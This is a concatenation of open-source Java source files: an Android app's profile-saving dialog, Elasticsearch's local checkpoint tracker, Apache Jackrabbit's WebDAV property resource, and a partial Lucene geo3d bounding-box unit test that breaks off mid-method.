linearLayout.setOrientation(LinearLayout.VERTICAL);
linearLayout.setGravity(Gravity.CENTER);
linearLayout.setPadding(30, 20, 30, 20);
TextView descriptionText = new TextView(getActivity());
descriptionText.setText(getString(R.string.profile_description));
linearLayout.addView(descriptionText);
final AppCompatEditText profileName = new AppCompatEditText(getActivity());
profileName.setTextColor(ContextCompat.getColor(getActivity(), Utils.DARKTHEME ? R.color.white : R.color.black));
profileName.setHint(getString(R.string.name));
profileName.setInputType(InputType.TYPE_CLASS_TEXT);
linearLayout.addView(profileName);
ScrollView scrollView = new ScrollView(getActivity());
scrollView.setPadding(0, 0, 0, 10);
linearLayout.addView(scrollView);
LinearLayout checkBoxLayout = new LinearLayout(getActivity());
checkBoxLayout.setOrientation(LinearLayout.VERTICAL);
scrollView.addView(checkBoxLayout);
AppCompatButton selectAllButton = new AppCompatButton(getActivity());
selectAllButton.setText(getString(R.string.select_all));
checkBoxLayout.addView(selectAllButton);
boolean load = true;
String start = getString(R.string.kernel);
String stop = getString(R.string.downloads);
final LinkedHashMap < Class, AppCompatCheckBox > items = new LinkedHashMap < > ();
for (DAdapter.DView item: Constants.VISIBLE_ITEMS) {
if (item.getTitle() != null) {
if (item.getTitle().equals(start)) load = false;
if (item.getTitle().equals(stop)) load = true;
if (item.getFragment() != null && !load) {
AppCompatCheckBox checkBox = new AppCompatCheckBox(getActivity());
checkBox.setText(item.getTitle());
checkBoxLayout.addView(checkBox);
items.put(item.getFragment().getClass(), checkBox);
}
}
}
if (items.size() < 1) {
Utils.toast(getString(R.string.removed_all_sections), getActivity());
return;
}
selectAllButton.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
for (Object checkbox: items.values().toArray())
((AppCompatCheckBox) checkbox).setChecked(true);
}
});
AlertDialog.Builder dialog = new AlertDialog.Builder(getActivity(),
(Utils.DARKTHEME ? R.style.AlertDialogStyleDark : R.style.AlertDialogStyleLight));
dialog.setView(linearLayout).setNegativeButton(getString(R.string.cancel),
new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {}
}).setPositiveButton(getString(R.string.ok),
new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
new Thread(new Runnable() {
@Override
public void run() {
final ProfileDB profileDB = new ProfileDB(getActivity());
List < String > applys = new ArrayList < > ();
for (int i = 0; i < items.size(); i++)
if (((AppCompatCheckBox) items.values().toArray()[i]).isChecked())
applys.addAll(Utils.getApplys((Class) items.keySet().toArray()[i]));
final LinkedHashMap < String, String > commands = new LinkedHashMap < > ();
for (CommandDB.CommandItem commandItem: commandItems)
for (String s: applys) {
String path = commandItem.getPath();
if (s.contains(path) || path.contains(s))
commands.put(path, commandItem.getCommand());
}
final String name = profileName.getText().toString();
if (!name.isEmpty() && commands.size() > 0 && profileDB.containProfile(name)) {
getHandler().post(new Runnable() {
@Override
public void run() {
AlertDialog.Builder replaceDialog = new AlertDialog.Builder(getActivity(),
(Utils.DARKTHEME ? R.style.AlertDialogStyleDark : R.style.AlertDialogStyleLight));
replaceDialog.setTitle(getString(R.string.replace_profile, name));
replaceDialog.setNegativeButton(getString(R.string.cancel),
new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {}
}).setPositiveButton(getString(R.string.ok),
new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
profileDB.delete(profileDB.getProfileId(name));
profileDB.putProfile(name, commands);
profileDB.commit();
}
}).show();
}
});
} else if (!name.isEmpty() && commands.size() > 0)
profileDB.putProfile(name, commands);
profileDB.commit();
getHandler().post(new Runnable() {
@Override
public void run() {
if (name.isEmpty())
Utils.toast(getString(R.string.empty_name), getActivity());
else if (commands.size() < 1)
Utils.toast(getString(R.string.no_settings), getActivity());
else create();
}
});
}
}).start();
}
}).show();
}
}
|
|
/*
* Licensed to Elasticsearch under one or more contributor
* license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright
* ownership. Elasticsearch licenses this file to you under
* the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.elasticsearch.index.seqno;
import org.apache.lucene.util.FixedBitSet;
import org.elasticsearch.common.SuppressForbidden;
import org.elasticsearch.common.settings.Setting;
import org.elasticsearch.index.IndexSettings;
import java.util.LinkedList;
/**
* This class generates sequences numbers and keeps track of the so-called "local checkpoint" which is the highest number for which all
* previous sequence numbers have been processed (inclusive).
*/
public class LocalCheckpointTracker {
/**
* We keep a bit for each sequence number that is still pending. To optimize allocation, we do so in multiple arrays allocating them on
* demand and cleaning up while completed. This setting controls the size of the arrays.
*/
public static Setting<Integer> SETTINGS_BIT_ARRAYS_SIZE =
Setting.intSetting("index.seq_no.checkpoint.bit_arrays_size", 1024, 4, Setting.Property.IndexScope);
/**
* An ordered list of bit arrays representing pending sequence numbers. The list is "anchored" in {@link #firstProcessedSeqNo} which
* marks the sequence number the fist bit in the first array corresponds to.
*/
final LinkedList<FixedBitSet> processedSeqNo = new LinkedList<>();
/**
* The size of each bit set representing processed sequence numbers.
*/
private final int bitArraysSize;
/**
* The sequence number that the first bit in the first array corresponds to.
*/
long firstProcessedSeqNo;
/**
* The current local checkpoint, i.e., all sequence numbers no more than this number have been completed.
*/
volatile long checkpoint;
/**
* The next available sequence number.
*/
private volatile long nextSeqNo;
/**
* Initialize the local checkpoint service. The {@code maxSeqNo} should be set to the last sequence number assigned, or
* {@link SequenceNumbersService#NO_OPS_PERFORMED} and {@code localCheckpoint} should be set to the last known local checkpoint,
* or {@link SequenceNumbersService#NO_OPS_PERFORMED}.
*
* @param indexSettings the index settings
* @param maxSeqNo the last sequence number assigned, or {@link SequenceNumbersService#NO_OPS_PERFORMED}
* @param localCheckpoint the last known local checkpoint, or {@link SequenceNumbersService#NO_OPS_PERFORMED}
*/
public LocalCheckpointTracker(final IndexSettings indexSettings, final long maxSeqNo, final long localCheckpoint) {
if (localCheckpoint < 0 && localCheckpoint != SequenceNumbersService.NO_OPS_PERFORMED) {
throw new IllegalArgumentException(
"local checkpoint must be non-negative or [" + SequenceNumbersService.NO_OPS_PERFORMED + "] "
+ "but was [" + localCheckpoint + "]");
}
if (maxSeqNo < 0 && maxSeqNo != SequenceNumbersService.NO_OPS_PERFORMED) {
throw new IllegalArgumentException(
"max seq. no. must be non-negative or [" + SequenceNumbersService.NO_OPS_PERFORMED + "] but was [" + maxSeqNo + "]");
}
bitArraysSize = SETTINGS_BIT_ARRAYS_SIZE.get(indexSettings.getSettings());
firstProcessedSeqNo = localCheckpoint == SequenceNumbersService.NO_OPS_PERFORMED ? 0 : localCheckpoint + 1;
nextSeqNo = maxSeqNo == SequenceNumbersService.NO_OPS_PERFORMED ? 0 : maxSeqNo + 1;
checkpoint = localCheckpoint;
}
/**
* Issue the next sequence number.
*
* @return the next assigned sequence number
*/
synchronized long generateSeqNo() {
return nextSeqNo++;
}
/**
* Marks the processing of the provided sequence number as completed as updates the checkpoint if possible.
*
* @param seqNo the sequence number to mark as completed
*/
public synchronized void markSeqNoAsCompleted(final long seqNo) {
// make sure we track highest seen sequence number
if (seqNo >= nextSeqNo) {
nextSeqNo = seqNo + 1;
}
if (seqNo <= checkpoint) {
// this is possible during recovery where we might replay an operation that was also replicated
return;
}
final FixedBitSet bitSet = getBitSetForSeqNo(seqNo);
final int offset = seqNoToBitSetOffset(seqNo);
bitSet.set(offset);
if (seqNo == checkpoint + 1) {
updateCheckpoint();
}
}
/**
* The current checkpoint which can be advanced by {@link #markSeqNoAsCompleted(long)}.
*
* @return the current checkpoint
*/
public long getCheckpoint() {
return checkpoint;
}
/**
* The maximum sequence number issued so far.
*
* @return the maximum sequence number
*/
long getMaxSeqNo() {
return nextSeqNo - 1;
}
/**
* constructs a {@link SeqNoStats} object, using local state and the supplied global checkpoint
*
* @implNote this is needed to make sure the local checkpoint and max seq no are consistent
*/
synchronized SeqNoStats getStats(final long globalCheckpoint) {
return new SeqNoStats(getMaxSeqNo(), getCheckpoint(), globalCheckpoint);
}
/**
* Waits for all operations up to the provided sequence number to complete.
*
* @param seqNo the sequence number that the checkpoint must advance to before this method returns
* @throws InterruptedException if the thread was interrupted while blocking on the condition
*/
@SuppressForbidden(reason = "Object#wait")
synchronized void waitForOpsToComplete(final long seqNo) throws InterruptedException {
while (checkpoint < seqNo) {
// notified by updateCheckpoint
this.wait();
}
}
/**
* Moves the checkpoint to the last consecutively processed sequence number. This method assumes that the sequence number following the
* current checkpoint is processed.
*/
@SuppressForbidden(reason = "Object#notifyAll")
private void updateCheckpoint() {
assert Thread.holdsLock(this);
assert checkpoint < firstProcessedSeqNo + bitArraysSize - 1 :
"checkpoint should be below the end of the first bit set (o.w. current bit set is completed and shouldn't be there)";
assert getBitSetForSeqNo(checkpoint + 1) == processedSeqNo.getFirst() :
"checkpoint + 1 doesn't point to the first bit set (o.w. current bit set is completed and shouldn't be there)";
assert getBitSetForSeqNo(checkpoint + 1).get(seqNoToBitSetOffset(checkpoint + 1)) :
"updateCheckpoint is called but the bit following the checkpoint is not set";
try {
// keep it simple for now, get the checkpoint one by one; in the future we can optimize and read words
FixedBitSet current = processedSeqNo.getFirst();
do {
checkpoint++;
// the checkpoint always falls in the first bit set or just before. If it falls
// on the last bit of the current bit set, we can clean it.
if (checkpoint == firstProcessedSeqNo + bitArraysSize - 1) {
processedSeqNo.removeFirst();
firstProcessedSeqNo += bitArraysSize;
assert checkpoint - firstProcessedSeqNo < bitArraysSize;
current = processedSeqNo.peekFirst();
}
} while (current != null && current.get(seqNoToBitSetOffset(checkpoint + 1)));
} finally {
// notifies waiters in waitForOpsToComplete
this.notifyAll();
}
}
/**
* Return the bit array for the provided sequence number, possibly allocating a new array if needed.
*
* @param seqNo the sequence number to obtain the bit array for
* @return the bit array corresponding to the provided sequence number
*/
private FixedBitSet getBitSetForSeqNo(final long seqNo) {
assert Thread.holdsLock(this);
assert seqNo >= firstProcessedSeqNo : "seqNo: " + seqNo + " firstProcessedSeqNo: " + firstProcessedSeqNo;
final long bitSetOffset = (seqNo - firstProcessedSeqNo) / bitArraysSize;
if (bitSetOffset > Integer.MAX_VALUE) {
throw new IndexOutOfBoundsException(
"sequence number too high; got [" + seqNo + "], firstProcessedSeqNo [" + firstProcessedSeqNo + "]");
}
while (bitSetOffset >= processedSeqNo.size()) {
processedSeqNo.add(new FixedBitSet(bitArraysSize));
}
return processedSeqNo.get((int) bitSetOffset);
}
/**
* Obtain the position in the bit array corresponding to the provided sequence number. The bit array corresponding to the sequence
* number can be obtained via {@link #getBitSetForSeqNo(long)}.
*
* @param seqNo the sequence number to obtain the position for
* @return the position in the bit array corresponding to the provided sequence number
*/
private int seqNoToBitSetOffset(final long seqNo) {
assert Thread.holdsLock(this);
assert seqNo >= firstProcessedSeqNo;
return ((int) (seqNo - firstProcessedSeqNo)) % bitArraysSize;
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.jackrabbit.webdav.jcr;
import org.apache.jackrabbit.commons.webdav.JcrValueType;
import org.apache.jackrabbit.commons.xml.SerializingContentHandler;
import org.apache.jackrabbit.server.io.IOUtil;
import org.apache.jackrabbit.webdav.DavException;
import org.apache.jackrabbit.webdav.DavResource;
import org.apache.jackrabbit.webdav.DavResourceFactory;
import org.apache.jackrabbit.webdav.DavResourceIterator;
import org.apache.jackrabbit.webdav.DavResourceIteratorImpl;
import org.apache.jackrabbit.webdav.DavResourceLocator;
import org.apache.jackrabbit.webdav.DavServletResponse;
import org.apache.jackrabbit.webdav.MultiStatusResponse;
import org.apache.jackrabbit.webdav.io.InputContext;
import org.apache.jackrabbit.webdav.io.OutputContext;
import org.apache.jackrabbit.webdav.jcr.property.JcrDavPropertyNameSet;
import org.apache.jackrabbit.webdav.jcr.property.LengthsProperty;
import org.apache.jackrabbit.webdav.jcr.property.ValuesProperty;
import org.apache.jackrabbit.webdav.lock.ActiveLock;
import org.apache.jackrabbit.webdav.lock.Scope;
import org.apache.jackrabbit.webdav.lock.Type;
import org.apache.jackrabbit.webdav.property.DavProperty;
import org.apache.jackrabbit.webdav.property.DavPropertyName;
import org.apache.jackrabbit.webdav.property.DavPropertyNameSet;
import org.apache.jackrabbit.webdav.property.DefaultDavProperty;
import org.apache.jackrabbit.webdav.property.PropEntry;
import org.apache.jackrabbit.webdav.xml.DomUtil;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.w3c.dom.Document;
import org.xml.sax.ContentHandler;
import org.xml.sax.SAXException;
import javax.jcr.Binary;
import javax.jcr.Item;
import javax.jcr.Property;
import javax.jcr.PropertyType;
import javax.jcr.RepositoryException;
import javax.jcr.Value;
import javax.jcr.ValueFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.dom.DOMSource;
import javax.xml.transform.sax.SAXResult;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.util.Collections;
import java.util.Date;
import java.util.List;
/**
* <code>DefaultItemResource</code> represents JCR property item.
*
* @see Property
*/
public class DefaultItemResource extends AbstractItemResource {
private static Logger log = LoggerFactory.getLogger(DefaultItemResource.class);
/**
* Create a new <code>DefaultItemResource</code>.
*
* @param locator
* @param session
*/
public DefaultItemResource(DavResourceLocator locator, JcrDavSession session,
DavResourceFactory factory, Item item) {
super(locator, session, factory, item);
}
//----------------------------------------------< DavResource interface >---
/**
* Returns false.
*
* @return false
* @see DavResource#isCollection()
*/
@Override
public boolean isCollection() {
return false;
}
/**
* Always returns 'now'
*
* @return
* @see DavResource#getModificationTime()
*/
@Override
public long getModificationTime() {
return new Date().getTime();
}
/**
* In case an underlying repository {@link Property property} exists the following
* logic is applied to spool the property content:
* <ul>
* <li>Property is not multi valued: Return the {@link javax.jcr.Value#getStream()
* stream representation} of the property value.</li>
* <li>Property is multivalue: Return the xml representation of the values.</li>
* </ul>
*
* @param outputContext
* @see DavResource#spool(OutputContext)
*/
@Override
public void spool(OutputContext outputContext) throws IOException {
// write properties
super.spool(outputContext);
// spool content
OutputStream out = outputContext.getOutputStream();
if (out != null && exists()) {
if (isMultiple()) {
spoolMultiValued(out);
} else {
spoolSingleValued(out);
}
}
}
private void spoolMultiValued(OutputStream out) {
try {
Document doc = DomUtil.createDocument();
doc.appendChild(getProperty(JCR_VALUES).toXml(doc));
ContentHandler handler =
SerializingContentHandler.getSerializer(out);
Transformer transformer =
TransformerFactory.newInstance().newTransformer();
transformer.transform(
new DOMSource(doc), new SAXResult(handler));
} catch (SAXException e) {
log.error("Failed to set up XML serializer for " + item, e);
} catch (TransformerConfigurationException e) {
log.error("Failed to set up XML transformer for " + item, e);
} catch (ParserConfigurationException e) {
log.error("Failed to set up XML document for " + item, e);
} catch (TransformerException e) {
log.error("Failed to serialize the values of " + item, e);
}
}
private void spoolSingleValued(OutputStream out) throws IOException {
try {
Binary binary = ((Property) item).getBinary();
try {
InputStream in = binary.getStream();
try {
IOUtil.spool(in, out);
} finally {
in.close();
}
} finally {
binary.dispose();
}
} catch (RepositoryException e) {
log.error("Cannot obtain stream from " + item, e);
}
}
@Override
public DavProperty<?> getProperty(DavPropertyName name) {
DavProperty prop = super.getProperty(name);
if (prop == null && exists()) {
try {
Property p = (Property) item;
if (isMultiple()) {
if (JCR_LENGTHS.equals(name)) {
prop = new LengthsProperty(p.getLengths());
}
} else {
if (JCR_LENGTH.equals(name)) {
long length = p.getLength();
prop = new DefaultDavProperty<String>(JCR_LENGTH, String.valueOf(length), true);
} else if (JCR_GET_STRING.equals(name) && p.getType() != PropertyType.BINARY) {
// getstring property is only created for single value
// non-binary jcr properties
prop = new DefaultDavProperty<String>(JCR_GET_STRING, p.getString(), true);
}
}
} catch (RepositoryException e) {
log.error("Failed to retrieve resource properties: "+e.getMessage());
}
}
return prop;
}
/**
* Sets the given property. Note, that {@link #JCR_VALUE} and {@link #JCR_VALUES}
* are the only resource properties that are allowed to be modified. Any other
* property is read-only and will throw an exception ('Conflict').
*
* @param property
* @throws DavException
* @see DavResource#setProperty(org.apache.jackrabbit.webdav.property.DavProperty)
*/
@Override
public void setProperty(DavProperty<?> property) throws DavException {
internalSetProperty(property);
complete();
}
/**
* Internal method that performs the setting or adding of properties
*
* @param property
* @throws DavException
* @see #setProperty(DavProperty)
* @see #alterProperties(List)
*/
private void internalSetProperty(DavProperty<?> property) throws DavException {
if (!exists()) {
throw new DavException(DavServletResponse.SC_NOT_FOUND);
}
try {
Property prop = (Property) item;
int defaultType = prop.getType();
ValueFactory vfact = getRepositorySession().getValueFactory();
ValuesProperty vp = new ValuesProperty(property, defaultType, vfact);
if (property.getName().equals(JCR_VALUE)) {
prop.setValue(vp.getJcrValue(vp.getValueType(), vfact));
} else if (property.getName().equals(JCR_VALUES)) {
prop.setValue(vp.getJcrValues());
} else {
throw new DavException(DavServletResponse.SC_CONFLICT);
}
} catch (RepositoryException e) {
throw new JcrDavException(e);
}
}
/**
* Removing properties is not allowed, for a single-value JCR-property without
* a value does not exist. For multivalue properties an empty {@link Value values array}
* may be specified with by setting the {@link #JCR_VALUES 'values' webdav property}.
*
* @param propertyName
* @throws DavException
* @see org.apache.jackrabbit.webdav.DavResource#removeProperty(org.apache.jackrabbit.webdav.property.DavPropertyName)
*/
@Override
public void removeProperty(DavPropertyName propertyName) throws DavException {
if (!exists()) {
throw new DavException(DavServletResponse.SC_NOT_FOUND);
}
throw new DavException(DavServletResponse.SC_FORBIDDEN);
}
/**
* Loops over the given <code>List</code> and alters the properties accordingly.
* Changes are persisted at the end only according to the rules defined with
* the {@link #complete()} method.<p>
* Please note: since there is only a single property than can be set
* from a client (i.e. jcr:value OR jcr:values) this method either succeeds
* or throws an exception, even if this violates RFC 2518.
*
* @param changeList
* @throws DavException
* @see DavResource#alterProperties(List)
*/
@Override
public MultiStatusResponse alterProperties(List<? extends PropEntry> changeList) throws DavException {
for (PropEntry propEntry : changeList) {
if (propEntry instanceof DavPropertyName) {
// altering any properties fails if an attempt is made to remove
// a property
throw new DavException(DavServletResponse.SC_FORBIDDEN);
} else if (propEntry instanceof DavProperty<?>) {
DavProperty<?> prop = (DavProperty<?>) propEntry;
internalSetProperty(prop);
} else {
throw new IllegalArgumentException("unknown object in change list: " + propEntry.getClass().getName());
}
}
complete();
return new MultiStatusResponse(getHref(), DavServletResponse.SC_OK);
}
/**
* Method is not allowed.
*
* @see org.apache.jackrabbit.webdav.DavResource#addMember(org.apache.jackrabbit.webdav.DavResource, InputContext)
*/
@Override
public void addMember(DavResource resource, InputContext inputContext) throws DavException {
throw new DavException(DavServletResponse.SC_METHOD_NOT_ALLOWED, "Cannot add members to a non-collection resource");
}
/**
* Always returns an empty iterator for a non-collection resource might
* not have internal members.
*
* @return an empty iterator
* @see DavResource#getMembers()
*/
@Override
public DavResourceIterator getMembers() {
log.warn("A non-collection resource never has internal members.");
List<DavResource> drl = Collections.emptyList();
return new DavResourceIteratorImpl(drl);
}
/**
* Method is not allowed.
*
* @see DavResource#removeMember(DavResource)
*/
@Override
public void removeMember(DavResource member) throws DavException {
throw new DavException(DavServletResponse.SC_METHOD_NOT_ALLOWED, "Cannot remove members from a non-collection resource");
}
/**
* {@link javax.jcr.Property JCR properties} are locked if their
* parent node is locked; thus this method will always return the
* {@link ActiveLock lock} object from the collection this resource is
* internal member of.
*
* @param type
* @param scope
* @return lock present on this resource or <code>null</code> if this resource
* has no lock.
* @see DavResource#getLock(Type, Scope)
*/
@Override
public ActiveLock getLock(Type type, Scope scope) {
if (Type.WRITE.equals(type)) {
return getCollection().getLock(type, scope);
} else {
return super.getLock(type, scope);
}
}
//--------------------------------------------------------------------------
@Override
protected void initPropertyNames() {
super.initPropertyNames();
if (exists()) {
DavPropertyNameSet propNames = (isMultiple() ?
JcrDavPropertyNameSet.PROPERTY_MV_SET :
JcrDavPropertyNameSet.PROPERTY_SET);
names.addAll(propNames);
}
}
/**
* Add resource specific properties.
*/
@Override
protected void initProperties() {
super.initProperties();
if (exists()) {
try {
Property prop = (Property)item;
int type = prop.getType();
// set the content type
String contentType;
if (isMultiple()) {
contentType = IOUtil.buildContentType("text/xml","utf-8");
} else {
contentType = IOUtil.buildContentType(JcrValueType.contentTypeFromType(type), "utf-8");
}
properties.add(new DefaultDavProperty<String>(DavPropertyName.GETCONTENTTYPE, contentType));
// add jcr-specific resource properties
properties.add(new DefaultDavProperty<String>(JCR_TYPE, PropertyType.nameFromValue(type)));
if (isMultiple()) {
properties.add(new ValuesProperty(prop.getValues()));
} else {
properties.add(new ValuesProperty(prop.getValue()));
}
} catch (RepositoryException e) {
log.error("Failed to retrieve resource properties: "+e.getMessage());
}
}
}
/**
* Returns true if the JCR Property represented by this resource is a multi
* value property. Note: if this resource does not exist or if the definition
* could not be retrieved false is returned.
*
* @return true if the underlying resource is a multi value property.
*/
private boolean isMultiple() {
try {
if (exists() && ((Property)item).isMultiple()) {
return true;
}
} catch (RepositoryException e) {
log.error("Error while retrieving property definition: " + e.getMessage());
}
return false;
}
}
|
|
package org.apache.lucene.geo3d;
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
import java.util.ArrayList;
import java.util.List;
import org.junit.Test;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertTrue;
public class GeoBBoxTest {
protected final double DEGREES_TO_RADIANS = Math.PI / 180.0;
@Test
public void testBBoxDegenerate() {
GeoBBox box;
GeoConvexPolygon cp;
int relationship;
List<GeoPoint> points = new ArrayList<GeoPoint>();
points.add(new GeoPoint(PlanetModel.SPHERE, 24 * DEGREES_TO_RADIANS, -30 * DEGREES_TO_RADIANS));
points.add(new GeoPoint(PlanetModel.SPHERE, -11 * DEGREES_TO_RADIANS, 101 * DEGREES_TO_RADIANS));
points.add(new GeoPoint(PlanetModel.SPHERE, -49 * DEGREES_TO_RADIANS, -176 * DEGREES_TO_RADIANS));
GeoMembershipShape shape = GeoPolygonFactory.makeGeoPolygon(PlanetModel.SPHERE, points, 0);
box = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, -64 * DEGREES_TO_RADIANS, -64 * DEGREES_TO_RADIANS, -180 * DEGREES_TO_RADIANS, 180 * DEGREES_TO_RADIANS);
relationship = box.getRelationship(shape);
assertEquals(GeoArea.CONTAINS, relationship);
box = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, -61.85 * DEGREES_TO_RADIANS, -67.5 * DEGREES_TO_RADIANS, -180 * DEGREES_TO_RADIANS, -168.75 * DEGREES_TO_RADIANS);
System.out.println("Shape = " + shape + " Rect = " + box);
relationship = box.getRelationship(shape);
assertEquals(GeoArea.CONTAINS, relationship);
}
@Test
public void testBBoxPointWithin() {
GeoBBox box;
GeoPoint gp;
// Standard normal Rect box, not crossing dateline
box = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, 0.0, -Math.PI * 0.25, -1.0, 1.0);
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, 0.0);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, 0.1, 0.0);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -Math.PI * 0.5, 0.0);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, 1.1);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, -1.1);
assertFalse(box.isWithin(gp));
assertEquals(0.1,box.computeOutsideDistance(DistanceStyle.ARC,gp),1e-2);
assertEquals(0.1,box.computeOutsideDistance(DistanceStyle.NORMAL,gp),1e-2);
assertEquals(0.1,box.computeOutsideDistance(DistanceStyle.NORMAL,gp),1e-2);
// Standard normal Rect box, crossing dateline
box = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, 0.0, -Math.PI * 0.25, Math.PI - 1.0, -Math.PI + 1.0);
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, -Math.PI);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, 0.1, -Math.PI);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -Math.PI * 0.5, -Math.PI);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, -Math.PI + 1.1);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, (-Math.PI - 1.1) + Math.PI * 2.0);
assertFalse(box.isWithin(gp));
// Latitude zone rectangle
box = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, 0.0, -Math.PI * 0.25, -Math.PI, Math.PI);
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, -Math.PI);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, 0.1, -Math.PI);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -Math.PI * 0.5, -Math.PI);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, -Math.PI + 1.1);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, (-Math.PI - 1.1) + Math.PI * 2.0);
assertTrue(box.isWithin(gp));
// World
box = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, -Math.PI, Math.PI);
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, -Math.PI);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, 0.1, -Math.PI);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -Math.PI * 0.5, -Math.PI);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, -Math.PI + 1.1);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, (-Math.PI - 1.1) + Math.PI * 2.0);
assertTrue(box.isWithin(gp));
}
@Test
public void testBBoxExpand() {
GeoBBox box;
GeoPoint gp;
// Standard normal Rect box, not crossing dateline
box = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, 0.0, -Math.PI * 0.25, -1.0, 1.0);
box = box.expand(0.1);
gp = new GeoPoint(PlanetModel.SPHERE, 0.05, 0.0);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, 0.15, 0.0);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -Math.PI * 0.25 - 0.05, 0.0);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -Math.PI * 0.25 - 0.15, 0.0);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, -1.05);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, -1.15);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, 1.05);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, 1.15);
assertFalse(box.isWithin(gp));
}
@Test
public void testBBoxBounds() {
GeoBBox c;
Bounds b;
c = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, 0.0, -Math.PI * 0.25, -1.0, 1.0);
b = c.getBounds(null);
assertFalse(b.checkNoLongitudeBound());
assertFalse(b.checkNoTopLatitudeBound());
assertFalse(b.checkNoBottomLatitudeBound());
assertEquals(-1.0, b.getLeftLongitude(), 0.000001);
assertEquals(1.0, b.getRightLongitude(), 0.000001);
assertEquals(-Math.PI * 0.25, b.getMinLatitude(), 0.000001);
assertEquals(0.0, b.getMaxLatitude(), 0.000001);
c = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, 0.0, -Math.PI * 0.25, 1.0, -1.0);
b = c.getBounds(null);
assertTrue(b.checkNoLongitudeBound());
assertFalse(b.checkNoTopLatitudeBound());
assertFalse(b.checkNoBottomLatitudeBound());
//assertEquals(1.0,b.getLeftLongitude(),0.000001);
//assertEquals(-1.0,b.getRightLongitude(),0.000001);
assertEquals(-Math.PI * 0.25, b.getMinLatitude(), 0.000001);
assertEquals(0.0, b.getMaxLatitude(), 0.000001);
c = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, -1.0, 1.0);
b = c.getBounds(null);
